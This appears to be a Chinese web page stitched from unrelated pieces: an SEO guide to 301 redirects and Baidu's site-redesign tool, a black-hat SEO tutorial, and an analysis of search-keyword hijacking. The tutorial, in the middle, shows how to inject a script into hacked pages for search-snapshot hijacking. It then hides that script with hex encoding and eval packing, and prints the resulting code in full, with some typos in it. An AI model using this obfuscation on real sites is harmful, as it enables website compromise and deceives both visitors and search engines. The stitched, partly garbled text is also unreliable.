即使网站在上线前已经有比较完善的页面布局,网站结构,在发展发展的过程中,也会因为各种各样的原因改版,这个时候,301永久重定向的作用就体现出来了。
一般来讲,网站改版分为两种。一种是前端页面改版。另外一种是链接结构发生变化如更换建站系统的改版。前者不用使用301,后者则必须使用301。注:即使是前端页面的改版,也会对主网站的流量造成影响,其中的原因应该是关键词的位置与频次因为页面的变化而发生了变化。
对于链接结构发生变化的网站来讲,需要采用一些方法,将流量损失的程度减小到最低,对于这种情况,我有几个方面的建议:
一:预估网站经历改版所造成的损失。套用百度站长平台的一句话“改性别也别改域名”,无论你采用多完美的改版方法,网站的流量波动,关键词排名波动几乎是不可避免的。前段时间seo每天一贴对网站的结构做了部分调整,seo主关键词的排名就受到了影响,虽然不能预估在这个时间段内损失了多少流量,但损失是肯定的。
二:确定一定以及肯定使用301永久重定向,不要使用302跳转。链接结构发生变化,要让老网址url跳转到对应的新url上。对于这个问题,需要告知领导层,告知正确改版方法的重要性,让领导层来推动改版工作的展开,而不是简单地与程序员沟通。从技术层面来讲,不管网站语言是php还是asp,都是有对应的方法的。另外,着重注意内容上面跳转的一一对应,老首页跳转到新首页,老目录跳转到新目录,老内页跳转到新内页。对于小型网站来讲,还有一个方法也可以使用,那就是把内容页的url设置成主域名/id.html的形式,这样如果遇到改版,就会很轻松的解决。
三:非常十分以及极其要求使用百度站长平台的“网站改版”工具。百度是国内搜索引擎中的老大,网站做这样大的变动,得通知百度爬虫,当然,如果条件允许,也可分别通知好搜以及搜狗。这里也有几种情况:
如果域名一致,只是目录及内容页url改变,那么你就可以使用“站点改版”。
如果域名不一致,有老域名和新域名,原来所有的url与新的url不一致,就需要使用“改版规则”或者“新旧url对”。具体操作,可查阅相关说明。这里也贴出来,如下:
1、需要您在站长平台同一账号验证新旧站点的权限。
2、在您提交改版规则之前,请确保您的网站已经设置好301跳转,并且是跳转一一对应的关系。
3、该工具针对的是网站链接的改变,网站内容改版不适用于该工具。
4、改版完成之后,在百度搜索前端会短时间内就看到替换效果,新站流量提升较快,索引量缓慢转移。
5、正常的改版过程是:规则校验中(0.5-2小时)->改版进行中(0.5-2天)->改版完成;其他异常状态请关注详细错误信息。
6、当状态为“部分改版中”时,说明您的规则校验成功率不高,只能对符合规则部分的链接进行改版,进度较慢,您可以删除原有规则重新提交。
7、您提交的三类改版形式,不能有交叉或者包含关系,即不能有一条链接同时属于多个改版形式。
8、改版跳转关系请长期保持,直到新站流量完全稳定。
9、对于以前提交的网站改版,现改版类型标识为“旧版站点”或“旧版目录”,新版本会兼容持续处理,但是建议按照新版本提交改版规则,有助于提高处理速度。
四:通过百度站长平台的链接提交工具,指引爬虫爬取更新后的网址url。可以使用自动提交中的sitemap功能,将最新的改版后的url以绝对地址的形式,放置到sitemap文件中。另外,改版前的sitemap可在改版后约7天左右的时间去掉。
五:注意观察百度站长平台的索引量数据。如果新url的索引量起来了,就说明使用的网站改版方法起效了。注意不同类型的网站,不同体量网站的起效时间有区别。
实际上,一旦确定网站需要改版,就需要考虑2个东西,一个是301永久重定向,另外一个是百度站长平台的改版工具。
一些黑帽SEO要对跳转的js代码进行加密,学习JavaScript加密方式,当我们网站被黑时,看到这段代码就明白这就是快照劫持的代码,删掉即可解决网站被黑问题。今天,错误博客(cuowu.com)分享的内容为《黑帽SEO教程为html中的js跳转url加密》。希望对大家有所帮助。
JavaScript跳转是黑帽SEO中快照劫持常见操作手法,比如在寄生虫程序使用中,在被黑掉的html或php中增加如下代码就可以完成快照劫持:
<script type=”text/javascript” src=”http://cuowu.com/ v6.js”></script>
这段JavaScript代码的作用是引入v6.js文件,v6.js文件中的内容为if判断语句,如果访问的是百度蜘蛛、360蜘蛛、搜狗蜘蛛等,则显示劫持的快照内容,如果是用户直接访问浏览器则会显示原页面内容。
首先把上面的命令增加为如下:
window[“document”][“write”](‘scritp type=”text/javascript” scr=”https://cuowu.com/ v6.js”‘)</script>;
然后,对前面双引号内的内容进行16进制加密,后面单引号内容也同样进行16进制加密,依次为:
\x64\x6f\x63\x75\x6d\x65\x6e\x74
\x77\x72\x69\x74\x65
\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73
这个可以用utf-8转16进制加密在线工具即可。错误博客站长导航里面有。
站长导航(https://cuowu.com/daohang/)
加密完成后变为:
window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;
然后,把上述的js代码再次补充一下才能正常运行,即:
<script type=”text/javascript”>
window[“\x64\x6f\x63\x75\x6d\x65\x6e\x74”][“\x77\x72\x69\x74\x65”](‘\x73\x63\x72\x69\x74\x70\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x63\x72\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x63\x75\x6f\x77\x75\x2e\x63\x6f\x6d\x2f\x76\x36\x2e\x6a\x73’)</script>;
</script>
把中间window到</script>;的内容利用站长工具的JS混淆加密压缩就可以得到eval加密形式,错误博客站长导航里面有。
站长导航(https://cuowu.com/daohang/)
获得如下加密代码如下:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))
最终获得的加密代码如下:
<script type=”text/javascript”>
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?””:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\w+’};c=1;};while(c–)if(k[c])p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c]);return p;}(‘k[“\m\a\1\9\g\5\l\0”][“\b\4\7\0\5”](\’\2\1\4\7\0\6\e\0\j\6\5\c\8\0\5\q\0\3\i\d\h\d\2\1\4\7\6\0\8\e\2\1\4\c\8\r\0\0\6\2\n\3\3\1\9\a\b\9\f\1\a\g\3\h\o\f\i\2\’)</p>;’,28,28,’x74|x63|x73|x2f|x72|x65|x70|x69|x22|x75|x6f|x77|x3d|x61|x20|x2e|x6d|x76|x6a|x79|window|x6e|x64|x3a|x36|script|x78|x68′.split(‘|’),0,{}))
</script>
这就是全部的js加密压缩过程了,解压过程反过来推就可以了。
以上就是错误博客(https://cuowu.com/)分享的内容为《黑帽SEO为html中的js加密(js混淆与16进制加密)》。感谢您的阅读。更多原创搜索“错误博客”。
家都知道典型的商业模式无非2种(广告、内容),围绕广告的产品是三级火箭(搜索引擎、杀毒软件、浏览器)和电商,而围绕内容制作的产品是网络文学、视频网站、电影制作。不管你是做广告还是做内容都需要有流量支撑,先不讲获取流量的形式及流量获取成本,今天主要聊一聊流量劫持,如果想要留住现有流量不妨先看看这篇文章,如果你将要进入这行更要看看黑暗系流量是怎么回事了!
到底什么是流量劫持,以下是百度百科的介绍:
“流量劫持,是利用各种恶意软件,木马修改浏览器、锁定主页或不停弹出新窗口等方式,强制用户访问某些网站,从而造成用户流量损失的情形。”
----- 百度百科
小白这么一听也许有点懵,毕竟又是恶意软件、又是病毒木马的,想想就吓人。到底什么才是流量劫持呢?其实流量劫持很容易理解,举个例子,你可以把流量理解成你的目的(例:你去购买水果,这是你的目的),而劫持方式就是引导或改变你的行为(例:刚刚你只想买水果,但由于刚刚受到某些外力影响后你发生些许变化,你购买水果的意愿变得不强烈或改变其本来意愿。你刚刚本来要买水果最后却没有买, 你本来想去 A店买水果,结果却去了B店),但为什么会发生这类事件吗,其实最终的原因都归于信息,明确的讲就是广告。绕了半天又绕道最初的商业模式了(广告),但凡广告都要变现,变现最原始的基础为网盟变现。如何从网盟能收割更多流量是每个IT从业者必须要思考的。网盟那么贵怎么办,那就劫持吧。比较常用的流量劫持方式: DNS 劫持、HTTP 劫持、浏览器劫持、路由器劫持等等。今天想给大家讲的是哪一种,DNS劫持,HTTP劫持,浏览器劫持??? NO NO NO 都不是,今天要跟大家分享的是一种比上述隐蔽性还强的搜索关键词劫持。
到底什么是搜索关键词劫持?
比如百度搜索某网站关键词,结果百度搜索后的结果是正确的,但是点击进去之后却跳转到别的网站上,但直接输入网址网站木有任何变化。
举个例子: 百度 搜索 (淘券吧) , 搞过淘客的小朋友,一看就明白,这是通过 百度下拉选取的关键词引流(见图一), 找到网址taojuanba.com.cn 点击进入(图二) 如果找不到(由于搜索引擎地域排序不同)也可以直接在搜索引擎输入该域名(图三)点击进入,网站会直接跳到 meisipei.com,一个教育招生单页(图四),而直接在 浏览器的 地址栏打开网站,网站还是淘客站,没有发生任何变化。(原理是根据搜索引擎的来路关键词发生跳转,如果非搜索引擎流量则不发生跳转。)
图一
图二
图三
图四
也许有很多小伙伴遇到过这个问题,但又不知道怎么回事,下午小编就帮大家拆解下,希望能给各位小伙伴带来帮助!
技术拆解:
第一步我们首先要判断网站是否为正常状态。可以通过第三方工具查看该网页是否是正常。
http状态是否为正常 200 ,说明网站是正常的,可以正常打开,但网页内容是否被篡改呢?
上图所示,网站正常抓取而非301/302跳转且,首页首页类型为 html 文件 即index.html
第二步,检索下蜘蛛,看看机器人抓取的内容是否为该网站内容,以此判断抓取的页面内容为该页面而非跳转页面。
上图所示,网页抓取内容正常!
第三步:根据刚刚工具得出的结论我们判断出网页是正常展示,快照内容也是正常网页内容
既然 端口 http 政策 , 机器人抓取正常,网页快照缓存也正常,有问题的就只能是源码了。
第四步:查看源码,除了引用模板外,有个本地index.js。
第五步:找到index.js , 打开该js ,为 加密状态 !
本着代码越是掩饰就有问题的态度,既然是加密JS ,那咱们就解密吧!
第六步:JS解密 ,解密3次 js为 得到以下内容 ,居然 混合 js 达到了 3次 ,看来也是人才,真不想要人知道,直接二进制多好。
居然定向到 daohang.asp,费了半天劲怎么是个页面啊,还加密肯定有问题,先在地址栏里打开看看,到底是什么鬼?
第七步:我们打开该目标地址 /daohang.asp ,爬虫抓取为空的地址却发生了跳转变化 , 跳转至教育单页。
整个搜索引擎关键词劫持过程复盘完毕,小编其实有话要说: 刚刚解码完毕的js 里 self.location 可以直接定向到 你想要跳转的网站 ,可 为什么该站长要加载daohang.asp做二次跳转呢,行内的小伙伴请在下方留言,高点赞的小伙伴会有神秘奖品噢,不明白或看不懂的小伙伴可以私信会私信小编,小编会在电脑的那一边等你 。
安静守护你的世界 - 安界
*请认真填写需求信息,我们会在24小时内与您取得联系。